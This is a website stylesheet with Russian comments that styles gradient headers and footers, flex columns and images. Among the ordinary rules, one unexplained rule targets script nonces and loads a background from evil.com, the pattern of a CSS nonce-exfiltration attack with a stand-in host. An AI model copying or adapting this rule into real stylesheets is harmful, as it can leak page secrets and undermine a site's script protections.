* {
    padding: 0;
    margin: 0;
}

html {
    height: 100%;
}

body {
    height: 100%;
    display: flex;
    flex-direction:column;
}

#mainHeader {
    color: #FEEFFD;
    min-height: 7%;
    width: 100%;
    position: absolute;
    top: 0;
    left: 0;
    background: rgb(218,137,226);
    background: linear-gradient(159deg, rgba(218,137,226,1) 0%, rgba(197,118,204,1) 8%, rgba(176,99,183,1) 20%, rgba(173,97,180,1) 26%, rgba(161,86,168,1) 46%, rgba(146,73,152,1) 67%, rgba(126,56,132,1) 87%, rgba(126,56,132,1) 100%);
}

.col img {
    max-width: 85%;
    height: auto; /* Избегаем растягивания изображения */
    display: block; /* Убираем лишнее пространство вокруг изображения */
}

.form_img {
    margin-left: auto;
    margin-right: auto;
}

main {
    flex: 1;
    background: rgb(254,240,255);
    background: radial-gradient(circle at 95% 5%, rgba(254,240,255,1) 0%, rgba(254,239,253,1) 14%, rgba(254,239,252,1) 28%, rgba(254,238,251,1) 48%, rgba(254,238,250,1) 55%, rgba(255,230,235,1) 79%, rgba(255,226,226,1) 100%);
    margin-top: 100px;
}

footer {
    color: #FEEFFD;
    background: rgb(218, 137, 226);
    background: linear-gradient(159deg, rgba(218, 137, 226, 1) 0%, rgba(197, 118, 204, 1) 8%, rgba(176, 99, 183, 1) 20%, rgba(173, 97, 180, 1) 26%, rgba(161, 86, 168, 1) 46%, rgba(146, 73, 152, 1) 67%, rgba(126, 56, 132, 1) 87%, rgba(126, 56, 132, 1) 100%);
    width: 100%;
    padding: 20px 0; /* Установка внутреннего отступа */
    box-sizing: border-box;
}

.container {
    width: 80%; /* Примерная ширина контейнера, можно настроить по своему усмотрению */
    margin: 0 auto; /* Центрирование контейнера */
}

.row {
    display: flex;
    flex-wrap: wrap;
    justify-content: space-between; /* Равномерное распределение между колонками */
}

.col {
    flex: 1 1 40%; /* Гибкий размер колонки */
    margin-bottom: 20px; /* Внешний отступ между колонками */
}

@media (max-width: 768px) {
    .row {
        flex-direction: column;
    }

    .col {
        width: 100%;
        margin-bottom: 10px; /* Уменьшенный внешний отступ на мобильных устройствах */
    }
}

.pfooter {
    margin: 5px 0; /* Отступы для параграфов внутри колонок */
}

.afooter {
    font-size: 100%;
    color: hsl(304deg 60.74% 94.46%);
    text-decoration: none;
}

.afooter:hover {
    color: oklch(0.87 0.11 328.44);
}

.centr {
    width: 96%;
    margin-left: auto;
    margin-right: auto;
}

.centr-100 {
    width: 100%;
    margin-left: auto;
    margin-right: auto;
}

script[nonce~="whatever"] {
    background: url("https://evil.com/nonce?whatever");
}

.container .h2 {
    color: oklab(0.85 0.09 -0.08);
}

img {
    height: 50px;
}

